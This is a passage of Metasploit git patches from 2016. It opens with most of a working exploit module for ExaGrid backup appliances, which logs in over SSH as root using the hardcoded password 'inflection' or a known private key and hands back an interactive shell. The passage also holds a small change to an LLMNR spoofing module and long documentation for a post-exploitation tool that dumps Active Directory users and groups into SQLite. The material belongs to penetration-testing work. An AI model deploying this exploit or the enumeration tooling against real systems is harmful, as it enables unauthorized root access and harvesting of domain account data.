password for root, 'inflection'. + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ "Universal", {} ] ], + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + 'Author' => ['egypt'], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] + ], + 'DisclosureDate' => "Apr 07 2016", + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0 + })) + + register_options( + [ + # Since we don't include Tcp, we have to register this manually + Opt::RHOST(), + Opt::RPORT(22) + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + + end + + # helper methods that normally come from Tcp + def rhost + datastore['RHOST'] + end + def rport + datastore['RPORT'] + end + + def do_login(user) + ssh_options = { + auth_methods: ['publickey', 'password'], + config: false, + disable_agent: true, + key_data: [ key_data ], + msfmodule: self, + msframework: framework, + password: 'inflection', + port: rport, + proxies: datastore['Proxies'], + record_auth_info: true, + } + ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG'] + + begin + ssh_socket = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh_socket = Net::SSH.start(rhost, user, ssh_options) + end + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh_socket + + # Create a new session from the socket, then dump it. + conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true) + ssh_socket = nil + + return conn + else + return false + end + end + + # Ghetto hack to prevent the shell detection logic from hitting false + # negatives due to weirdness with ssh sockets. We already know it's a shell + # because auth succeeded by this point, so no need to do the check anyway. + module TrustMeItsAShell + def _check_shell(*args) + true + end + end + + def exploit + payload_instance.extend(TrustMeItsAShell) + + conn = do_login("root") + if conn + print_good "Successful login" + service_data = { + address: rhost, + port: rport, + protocol: 'tcp', + service_name: 'ssh', + workspace_id: myworkspace_id, + } + credential_data = { + username: 'root', + private_type: (conn.ssh.auth_info[:method] == "publickey" ? :ssh_key : :password), + private_data: (conn.ssh.auth_info[:method] == "publickey" ? key_data : 'inflection'), + origin_type: :service, + module_fullname: fullname, + }.merge(service_data) + + core = create_credential(credential_data) + login_data = { + core: core, + last_attempted: Time.now, + }.merge(service_data) + + create_credential_login(login_data) + + handler(conn.lsock) + end + end + + def key_data + < Date: Thu, 7 Apr 2016 08:39:29 -0500 Subject: [PATCH 674/686] Add CVEs --- modules/exploits/linux/ssh/exagrid_known_privkey.rb | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb index a58c8a7224..2e605ecf36 100644 --- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb @@ -19,11 +19,11 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, { 'Name' => 'ExaGrid Known SSH Key and Default Password', 'Description' => %q{ - ExaGrid ships a public/private key pair on their backup appliances - that allows passwordless authentication to other ExaGrid appliances. - Since the private key is easily retrievable, an attacker can use it to - gain unauthorized remote access as root. Additionally, this module - will also attempt to use the default password for root, 'inflection'. + ExaGrid ships a public/private key pair on their backup appliances to + allow passwordless authentication to other ExaGrid appliances. Since + the private key is easily retrievable, an attacker can use it to gain + unauthorized remote access as root. Additionally, this module will + attempt to use the default password for root, 'inflection'. }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, @@ -40,6 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ + [ 'CVE', '2016-1560' ], # password + [ 'CVE', '2016-1561' ], # private key [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] ], 'DisclosureDate' => "Apr 07 2016", From fa5acba400051161db5978197db3882cbf97b453 Mon Sep 17 00:00:00 2001 From: Sonny Gonzalez Date: Thu, 7 Apr 2016 10:59:05 -0500 Subject: [PATCH 675/686] TTL setting honors TTL option * change hard-coded ttl value to TTL option * set TTL option default to 30 --- modules/auxiliary/spoof/llmnr/llmnr_response.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/spoof/llmnr/llmnr_response.rb b/modules/auxiliary/spoof/llmnr/llmnr_response.rb index 59a2f02999..5b604415fb 100644 --- a/modules/auxiliary/spoof/llmnr/llmnr_response.rb +++ b/modules/auxiliary/spoof/llmnr/llmnr_response.rb @@ -44,7 +44,7 @@ attr_accessor :sock, :thread register_options([ OptAddress.new('SPOOFIP', [ true, "IP address with which to poison responses", ""]), OptRegexp.new('REGEX', [ true, "Regex applied to the LLMNR Name to determine if spoofed reply is sent", '.*']), - OptInt.new('TTL', [ false, "Time To Live for the spoofed response", 300]), + OptInt.new('TTL', [ false, "Time To Live for the spoofed response", 30]), ]) deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER') @@ -85,7 +85,7 @@ attr_accessor :sock, :thread when ::Net::DNS::A dns_pkt.answer << ::Net::DNS::RR::A.new( :name => name, - :ttl => 30, + :ttl => datastore['TTL'], :cls => ::Net::DNS::IN, :type => ::Net::DNS::A, :address => spoof.to_s @@ -93,7 +93,7 @@ attr_accessor :sock, :thread when ::Net::DNS::AAAA dns_pkt.answer << ::Net::DNS::RR::AAAA.new( :name => name, - :ttl => 30, + :ttl => datastore['TTL'], :cls => ::Net::DNS::IN, :type => ::Net::DNS::AAAA, :address => (spoof.ipv6? ? spoof : spoof.ipv4_mapped).to_s From c4aac2a54ad0c5873dd9ddf9c16ef99bc48a99ba Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 7 Apr 2016 11:22:57 -0500 Subject: [PATCH 676/686] Remove unwanted comments --- modules/exploits/linux/ssh/exagrid_known_privkey.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb index 2e605ecf36..7fc0d39526 100644 --- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb @@ -5,9 +5,6 @@ require 'msf/core' require 'net/ssh' -#load 'lib/msf/core/handler/find_port.rb' -#load 'lib/msf/core/handler.rb' -#load 'lib/msf/core/exploit.rb' class MetasploitModule < Msf::Exploit::Remote From 0d3eb4f05518bc9cdf9e442b3bb636ce341526ef Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 7 Apr 2016 12:15:32 -0500 Subject: [PATCH 677/686] Change class name to MetasploitModule --- modules/post/windows/gather/ad_to_sqlite.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_to_sqlite.rb b/modules/post/windows/gather/ad_to_sqlite.rb index 7cdeccb412..5f84cad615 100644 --- a/modules/post/windows/gather/ad_to_sqlite.rb +++ b/modules/post/windows/gather/ad_to_sqlite.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'sqlite3' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::LDAP def initialize(info = {}) From c072028f0e57762af8ac6b3414bc6d017108cd13 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 7 Apr 2016 16:43:55 -0500 Subject: [PATCH 678/686] Add documentation for post/windows/gather/ad_to_sqlite --- .../post/windows/gather/ad_to_sqlite.md | 521 ++++++++++++++++++ 1 file changed, 521 insertions(+) create mode 100644 documentation/modules/post/windows/gather/ad_to_sqlite.md diff --git a/documentation/modules/post/windows/gather/ad_to_sqlite.md b/documentation/modules/post/windows/gather/ad_to_sqlite.md new file mode 100644 index 0000000000..e6c0321023 --- /dev/null +++ b/documentation/modules/post/windows/gather/ad_to_sqlite.md @@ -0,0 +1,521 @@ +This is a post exploitation module which has the effect of copying the AD groups, user membership +(taking into account nested groups), user information and computers to a local SQLite database. +This is particularly useful for red teaming and simulated attack engagements because it offers +the ability to gain situational awareness of the target's domain completely offline. Examples of +queries that can be run locally include: + +* Identification of members in a particular group (e.g. 'Domain Admins'), taking into account + members of nested groups. +* Organizational hierarchy information (if the manager LDAP attribute is used). +* Ability to determine group membership and user membership (e.g. 'What groups are these users a + member of?', 'What users are members of these groups?', 'List all members who are effectively + members of the Domain Admins group who are not disabled' etc) +* Expansion of the userAccountControl and sAMAccountType variables for querying ease. +* Generation of a list of DNS hostnames, computer names, operating system versions etc of each + domain joined computer. +* Identification of security groups that have managers. +* Exporting anything above in different formats, including those which can be imported into + other tools. + +## Mechanism + +This module makes heavy usage of ADSI and performs the following basic steps: + +**User and group acquisition** + +* Perform an ADSI query to list all active directory groups and store them in the local ad_groups + table (parsing attributes which contain flags). +* Loop through them and, for each group, launch another LDAP query to list the effective members of + the group (using the LDAP_MATCHING_RULE_IN_CHAIN OID). The effect is that it will reveal all + effective members of that group, even if they are not direct members of the group. +* For each user, perform another query to obtain user specific attributes and insert them into the + local ad_users table. +* Insert a new row into the ad_mapping table associating the user RID with the group RID. + +**Computer acquisition** + +* Perform an ADSI query to list all computers in the domain. +* Parse any attributes containing flags (userAccountControl, sAMAccountType) and insert them into + the local ad_computers table. + +## Module Specific Options + +Option | Purpose +--------------- | -------- +GROUP_FILTER | Additional LDAP filters to apply when building the initial list of groups. +SHOW_COMPUTERS | If set to TRUE, this will write a line-by-line list of computers, in the format: ```Computer [Name][DNS][RID]``` to the console. For example: ```Computer [W2K8DC][W2K8DC.goat.stu][1000]``` +SHOW_USERGROUPS | If set to TRUE, this will write a line-by-line list of user to group memberships, in the format: ```Group [Group Name][Group RID] has member [Username][User RID]```. For example: ```Group [Domain Users][513] has member [it.director][1132]```. This can be used mainly for progress, but it may be simpler to cat and grep for basic queries. However, the real power of this module comes from the ability to rapidly perform queries against the SQLite database. + +## SQLite Database + +**Construction** + +The following tables will be present in the local SQLite database. The ad_* tables use the RID of +the user, computer or group as the primary key, and the view_mapping table effectively joins the +ad_mapping table with ad_users.* and ad_groups.* by RID. + +Note that the purpose of the less obvious flags is documented in the source code, along with +references to MSDN and Technet where appropriate, so this can be easily looked up during an +engagement without needing to refer to this page. + +Table Name | Purpose +------------ | -------- +ad_computers | Information on each of the domain joined computers. +ad_users | Information on each of the domain users. +ad_groups | Information on each of the active directory groups. +ad_mapping | Links the users table to the groups table (i.e. can be used to show which users are effectively members of which groups). +view_mapping | Joins the ad_mapping table to the ad_users and ad_groups table, provided for convenience. This will be the table that most queries will be run against. + +Within each table, the naming convention for the columns is to prefix anything in the +ad_computers table with c_, anything in the ad_users table with u_ and anything in the +ad_groups table with g_. This convention makes the joins between tables much more intuitive. + +**ad_computers** + +The table below shows the columns in the ad_computers table. The fields in capitals at the end +(c_ADS_* and c_SAM_*) are expanded from the userAccountControl and sAMAccountType attributes to +provide an easy way to perform the queries against individual flags. + +Column Name | Type | Purpose +------------------------------------------------ | ------- | -------- +c_rid | INTEGER | The relative identifier which is derived from the objectSid (i.e. the last group of digits). +c_distinguishedName | TEXT | The main 'fully qualified' reference to the object. See [Distinguished Names](https://msdn.microsoft.com/en-us/library/windows/desktop/aa366101%28v=vs.85%29.aspx). +c_cn | TEXT | The name that represents an object. Used to perform searches. +c_sAMAccountType | INTEGER | This attribute contains information about every account type object. As this can only have one value, it would be more efficient to implement a lookup table for this, but I have included individual flags simply for consistency. +c_sAMAccountName | TEXT | The logon name used to support clients and servers running earlier versions of the operating system. +c_dNSHostName | TEXT | The name of computer, as registered in DNS. +c_displayName | TEXT | The display name for an object. This is usually the combination of the users first name, middle initial, and last name. +c_logonCount | INTEGER | The number of times the account has successfully logged on. A value of 0 indicates that the value is unknown. +c_userAccountControl | INTEGER | Flags that control the behavior of the user account. See [Use-Account-Control attribute](https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832%28v=vs.85%29.aspx) for a description, but they are also parsed and stored in the c_ADS_UF_* columns below. +c_primaryGroupID | INTEGER | Contains the relative identifier (RID) for the primary group of the user. By default, this is the RID for the Domain Users group. +c_badPwdCount | INTEGER | The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown. +c_description | TEXT | Contains the description to display for an object. +c_comment | TEXT | The user's comment. This string can be a null string. Sometimes passwords or sensitive information can be stored here. +c_operatingSystem | TEXT | The Operating System name, for example, Windows Vista Enterprise. +c_operatingSystemServicePack | TEXT | The operating system service pack ID string (for example, SP3). +c_operatingSystemVersion | TEXT | The operating system version string, for example, 4.0. +c_whenChanged | TEXT | The date when this object was last changed. This value is not replicated and exists in the global catalog. +c_whenCreated | TEXT | The date when this object was created. This value is replicated and is in the global catalog. +c_ADS_UF_SCRIPT | INTEGER | If 1, the logon script is executed. +c_ADS_UF_ACCOUNTDISABLE | INTEGER | If 1, the user account is disabled. +c_ADS_UF_HOMEDIR_REQUIRED | INTEGER | If 1, the home directory is required. +c_ADS_UF_LOCKOUT | INTEGER | If 1, the account is currently locked out. +c_ADS_UF_PASSWD_NOTREQD | INTEGER | If 1, no password is required. +c_ADS_UF_PASSWD_CANT_CHANGE | INTEGER | If 1, the user cannot change the password. +c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED | INTEGER | If 1, the user can send an encrypted password. +c_ADS_UF_TEMP_DUPLICATE_ACCOUNT | INTEGER | If 1, this is an account for users whose primary account is in another domain. This account provides user access to this domain, but not to any domain that trusts this domain. Also known as a local user account. +c_ADS_UF_NORMAL_ACCOUNT | INTEGER | If 1, this is a default account type that represents a typical user. +c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT | INTEGER | If 1, this is a permit to trust account for a system domain that trusts other domains. +c_ADS_UF_WORKSTATION_TRUST_ACCOUNT | INTEGER | If 1, this is a computer account for a computer that is a member of this domain. +c_ADS_UF_SERVER_TRUST_ACCOUNT | INTEGER | If 1, this is a computer account for a system backup domain controller that is a member of this domain. +c_ADS_UF_DONT_EXPIRE_PASSWD | INTEGER | If 1, the password for this account will never expire. +c_ADS_UF_MNS_LOGON_ACCOUNT | INTEGER | If 1, this is an MNS logon account. +c_ADS_UF_SMARTCARD_REQUIRED | INTEGER | If 1, the user must log on using a smart card. +c_ADS_UF_TRUSTED_FOR_DELEGATION | INTEGER | If 1, the service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. Any such service can impersonate a client requesting the service. +c_ADS_UF_NOT_DELEGATED | INTEGER | If 1, the security context of the user will not be delegated to a service even if the service account is set as trusted for Kerberos delegation. +c_ADS_UF_USE_DES_KEY_ONLY | INTEGER | If 1, restrict this principal to use only Data Encryption Standard (DES) encryption types for keys. +c_ADS_UF_DONT_REQUIRE_PREAUTH | INTEGER | If 1, this account does not require Kerberos pre-authentication for logon. +c_ADS_UF_PASSWORD_EXPIRED | INTEGER | If 1, the user password has expired. This flag is created by the system using data from the Pwd-Last-Set attribute and the domain policy. +c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION | INTEGER | If 1, the account is enabled for delegation. This is a security-sensitive setting; accounts with this option enabled should be strictly controlled. This setting enables a service running under the account to assume a client identity and authenticate as that user to other remote servers on the network. +c_SAM_DOMAIN_OBJECT | INTEGER | See [SAM-Account-Type](https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637%28v=vs.85%29.aspx) attribute. If 1, this flag is set. +c_SAM_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_NON_SECURITY_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_NON_SECURITY_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_USER_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_NORMAL_USER_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_MACHINE_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_TRUST_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_APP_BASIC_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_APP_QUERY_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +c_SAM_ACCOUNT_TYPE_MAX | INTEGER | If 1, this flag is set (sAMAccountType attribute). + +**ad_users** + +The table below shows the columns in the ad_computers table. The fields in capitals at the end +(c_ADS_* and c_SAM_*) are expanded from the userAccountControl and sAMAccountType attributes to +provide an easy way to perform the queries against individual flags. + +Column Name | Type | Purpose +------------------------------------------------| ------- | ------- +u_rid | INTEGER | The relative identifier which is derived from the objectSid (i.e. the last group of digits). +u_distinguishedName | TEXT | The main 'fully qualified' reference to the object. See [Distinguished Names](https://msdn.microsoft.com/en-us/library/windows/desktop/aa366101%28v=vs.85%29.aspx). +u_cn | TEXT | The name that represents an object. Used to perform searches. +u_sAMAccountType | INTEGER | This attribute contains information about every account type object. As this can only have one value, it would be more efficient to implement a lookup table for this, but I have included individual flags simply for consistency. +u_sAMAccountName | TEXT | The logon name used to support clients and servers running earlier versions of the operating system. +u_dNSHostName | TEXT | The name of computer, as registered in DNS. +u_displayName | TEXT | The display name for an object. This is usually the combination of the users first name, middle initial, and last name. +u_logonCount | INTEGER | The number of times the account has successfully logged on. A value of 0 indicates that the value is unknown. +u_userPrincipalName | TEXT | Technically, this is an Internet-style login name for a user based on the Internet standard RFC 822. By convention and in practice, it is the user's e-mail address. +u_displayName | TEXT | N/A +u_adminCount | INTEGER | Indicates that a given object has had its ACLs changed to a more secure value by the system because it was a member of one of the administrative groups (directly or transitively). +u_userAccountControl | INTEGER | Flags that control the behavior of the user account. See [User-Account-Control](https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832%28v=vs.85%29.aspx) for a description, but they are also parsed and stored in the c_ADS_UF_* columns below. +u_primaryGroupID | INTEGER | Contains the relative identifier (RID) for the primary group of the user. By default, this is the RID for the Domain Users group. +u_badPwdCount | INTEGER | The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown. +u_description | TEXT | Contains the description to display for an object. +u_title | TEXT | Contains the user's job title. This property is commonly used to indicate the formal job title, such as Senior Programmer, rather than occupational class. +u_manager | TEXT | The distinguished name of this user's manager. +u_comment | TEXT | The user's comment. This string can be a null string. Sometimes passwords or sensitive information can be stored here. +u_whenChanged | TEXT | The date when this object was last changed. This value is not replicated and exists in the global catalog. +u_whenCreated | TEXT | The date when this object was created. This value is replicated and is in the global catalog. +u_ADS_UF_SCRIPT | INTEGER | If 1, the logon script is executed. +u_ADS_UF_ACCOUNTDISABLE | INTEGER | If 1, the user account is disabled. +u_ADS_UF_HOMEDIR_REQUIRED | INTEGER | If 1, the home directory is required. +u_ADS_UF_LOCKOUT | INTEGER | If 1, the account is currently locked out. +u_ADS_UF_PASSWD_NOTREQD | INTEGER | If 1, no password is required. +u_ADS_UF_PASSWD_CANT_CHANGE | INTEGER | If 1, the user cannot change the password. +u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED | INTEGER | If 1, the user can send an encrypted password. +u_ADS_UF_TEMP_DUPLICATE_ACCOUNT | INTEGER | If 1, this is an account for users whose primary account is in another domain. This account provides user access to this domain, but not to any domain that trusts this domain. Also known as a local user account. +u_ADS_UF_NORMAL_ACCOUNT | INTEGER | If 1, this is a default account type that represents a typical user. +u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT | INTEGER | If 1, this is a permit to trust account for a system domain that trusts other domains. +u_ADS_UF_WORKSTATION_TRUST_ACCOUNT | INTEGER | If 1, this is a computer account for a computer that is a member of this domain. +u_ADS_UF_SERVER_TRUST_ACCOUNT | INTEGER | If 1, this is a computer account for a system backup domain controller that is a member of this domain. +u_ADS_UF_DONT_EXPIRE_PASSWD | INTEGER | If 1, the password for this account will never expire. +u_ADS_UF_MNS_LOGON_ACCOUNT | INTEGER | If 1, this is an MNS logon account. +u_ADS_UF_SMARTCARD_REQUIRED | INTEGER | If 1, the user must log on using a smart card. +u_ADS_UF_TRUSTED_FOR_DELEGATION | INTEGER | If 1, the service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. Any such service can impersonate a client requesting the service. +u_ADS_UF_NOT_DELEGATED | INTEGER | If 1, the security context of the user will not be delegated to a service even if the service account is set as trusted for Kerberos delegation. +u_ADS_UF_USE_DES_KEY_ONLY | INTEGER | If 1, restrict this principal to use only Data Encryption Standard (DES) encryption types for keys. +u_ADS_UF_DONT_REQUIRE_PREAUTH | INTEGER | If 1, this account does not require Kerberos pre-authentication for logon. +u_ADS_UF_PASSWORD_EXPIRED | INTEGER | If 1, the user password has expired. This flag is created by the system using data from the Pwd-Last-Set attribute and the domain policy. +u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION | INTEGER | If 1, the account is enabled for delegation. This is a security-sensitive setting; accounts with this option enabled should be strictly controlled. This setting enables a service running under the account to assume a client identity and authenticate as that user to other remote servers on the network. +u_SAM_DOMAIN_OBJECT | INTEGER | See [SAM-Account-Type](https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637%28v=vs.85%29.aspx). If 1, this flag is set. +u_SAM_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_NON_SECURITY_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_NON_SECURITY_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_USER_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_NORMAL_USER_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_MACHINE_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_TRUST_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_APP_BASIC_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_APP_QUERY_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +u_SAM_ACCOUNT_TYPE_MAX | INTEGER | If 1, this flag is set (sAMAccountType attribute). + +**ad_groups** + +The table below shows the columns in the ad_groups table. + +Column Name | Type | Purpose +--------------------------------| ------- | ------- +g_rid | INTEGER | The relative identifier which is derived from the objectSid (i.e. the last group of digits). +g_distinguishedName | TEXT | The main 'fully qualified' reference to the object. See [Distinguished Names](https://msdn.microsoft.com/en-us/library/windows/desktop/aa366101%28v=vs.85%29.aspx). +g_sAMAccountType | INTEGER | This attribute contains information about every account type object. As this can only have one value, it would be more efficient to implement a lookup table for this, but I have included individual flags simply for consistency. +g_sAMAccountName | TEXT | The logon name used to support clients and servers running earlier versions of the operating system. +g_adminCount | INTEGER | Indicates that a given object has had its ACLs changed to a more secure value by the system because it was a member of one of the administrative groups (directly or transitively). +g_description | TEXT | Contains the description to display for an object. +g_comment | TEXT | The user's comment. This string can be a null string. Sometimes passwords or sensitive information can be stored here. +g_whenChanged | TEXT | The date when this object was last changed. This value is not replicated and exists in the global catalog. +g_whenCreated | TEXT | The date when this object was created. This value is replicated and is in the global catalog. +g_managedby | TEXT | The manager of this group. +g_cn | TEXT | The common name of the group. +g_groupType | INTEGER | Contains a set of flags that define the type and scope of a group object. These are expanded in the g_GT_* fields below. +g_GT_GROUP_CREATED_BY_SYSTEM | INTEGER | If 1, this is a group that is created by the system. +g_GT_GROUP_SCOPE_GLOBAL | INTEGER | If 1, this is a group with global scope. +g_GT_GROUP_SCOPE_LOCAL | INTEGER | If 1, this is a group with domain local scope. +g_GT_GROUP_SCOPE_UNIVERSAL | INTEGER | If 1, this is a group with universal scope. +g_GT_GROUP_SAM_APP_BASIC | INTEGER | If 1, this specifies an APP_BASIC group for Windows Server Authorisation Manager. +g_GT_GROUP_SAM_APP_QUERY | INTEGER | If 1, this specifies an APP_QUERY group for Windows Server Authorisation Manager. +g_GT_GROUP_SECURITY | INTEGER | If 1, this specifies a security group. +g_GT_GROUP_DISTRIBUTION | INTEGER | If 1, this specifies a distribution group (this is the inverse of g_GT_GROUP_SECURITY). I have included it so that distribution groups can be identified more easily (query readability). +g_SAM_DOMAIN_OBJECT | INTEGER | See [SAM-Account-Type](https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637%28v=vs.85%29.aspx). If 1, this flag is set. +g_SAM_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_NON_SECURITY_GROUP_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_NON_SECURITY_ALIAS_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_USER_OBJECT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_NORMAL_USER_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_MACHINE_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_TRUST_ACCOUNT | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_APP_BASIC_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_APP_QUERY_GROUP | INTEGER | If 1, this flag is set (sAMAccountType attribute). +g_SAM_ACCOUNT_TYPE_MAX | INTEGER | If 1, this flag is set (sAMAccountType attribute). + +**ad_mapping** + +The table below shows the columns in the ad_mapping table. This is used to link users to groups. + +Column Name | Type | Purpose +------------| ------- | ------- +user_rid | INTEGER | The RID of a user +group_rid | INTEGER | The RID of a group + +For example, if a particular record had a user_rid of 1000 and a group_rid of 1001, this would +imply that the user whose RID is 1000 is a member of the group whose RID is 1001. Use the +view_mapping view in order to do any meaningful queries, but its content is derived from this one. + +**view_mapping** + +This table is a combination of ad_groups.* and ad_users.*. Therefore, the fields are the +combination of the u_* and the g_* fields shown above. + +## Database Structure + +There are a few design choices that I have deliberately made which I have given an explanation for +below. This is because the reasons for them may not be obvious. + +The users, groups and computers are based on the same class, so the "proper" way to do this would +be to place them all into one table and then restrict results based on sAMAccountType to determine +what type of object it is. In addition, the userAccountControl and sAMAccountType and groupType +attributes have been split out into individual columns which is, from a technical point of view, +unnecessary duplication. + +The reason for this is ease of use; we are much more intuitively familiar with users, groups and +computers being different objects (even if they are all really the same thing), and it is much +easier to understand and formulate a query such as: + +``` +SELECT u_sAMAccountName from ad_users where u_ADS_UF_LOCKOUT = 0 and u_SAM_NORMAL_USER_ACCOUNT = 1 +``` + +than: + +``` +SELECT u_sAMAccountName from ad_users where ((u_userAccountControl&0x00000010) = 0) and ((u_sAMAccountType&0x30000000) > 0) +``` + +This is also true of the sAMAccountType value; this is a code which has a 1:1 mapping with MSDN +constants (i.e. they are not flags) and it would be more efficient to implement a simple lookup table. +However, for consistency, I have implemented the columns for the possible values in the same way as +the attributes which comprise multiple values in the form of flags. + +This database is designed for quick-and-dirty queries, not to be an efficient AD database, and the +benefits of the ease of access significantly outweighs the slight performance impact. + +## Conversion to Unicode + +All of the strings injected into the database have been converted to UTF-8 (encode('UTF-8')) which, +at first glance, does not seem necessary. The reason is documented [here](https://github.com/rails/rails/issues/1965); +namely that SQLite stores Unicode strings as 'text' but non-converted strings as 'blobs' regardless +of the type affinity. Omitting the unicode conversion meant that most of the text queries did not +work properly because the database was treating the text fields as raw binary data. + +## Multi valued attributes + +With the exception of the memberOf attribute, it is assumed that other attributes are single +valued, which may result in a small about of information being missed. For example, the +description attribute can (in some circumstances) be multi-valued but the ADSI queries will only +return the first value. + +This will not make any practical difference for the vast majority of enterprise domains. + +## Database Queries + +Sqlite3 supports a number of output formats (use .mode for all options). These can be used to +easily present the searched data. + +For example, line mode is useful to see all fields in an easy to view form. The example query +searches for all information about the user whose username is 'unprivileged.user' + +``` +sqlite> .mode line +sqlite> select * from ad_users where u_sAMAccountName = "unprivileged.user"; + u_rid = 1127 + u_distinguishedName = CN=Unprivileged User,CN=Users,DC=goat,DC=stu + u_description = Do not delete. Default pass set to password123 + u_displayName = Unprivileged User + u_sAMAccountType = 805306368 + u_sAMAccountName = unprivileged.user + u_logonCount = 1 + u_userAccountControl = 512 + u_primaryGroupID = 513 + u_cn = Unprivileged User + u_adminCount = 1 + u_badPwdCount = 0 + u_userPrincipalName = unprivileged.user@goat.stu + u_comment = + u_title = + u_manager = CN=Stuart Morgan - User,CN=Users,DC=goat,DC=stu + u_whenCreated = 2015-12-20 20:10:54.000 + u_whenChanged = 2015-12-20 23:12:48.000 + u_ADS_UF_SCRIPT = 0 + u_ADS_UF_ACCOUNTDISABLE = 0 + u_ADS_UF_HOMEDIR_REQUIRED = 0 + u_ADS_UF_LOCKOUT = 0 + u_ADS_UF_PASSWD_NOTREQD = 0 + u_ADS_UF_PASSWD_CANT_CHANGE = 0 + 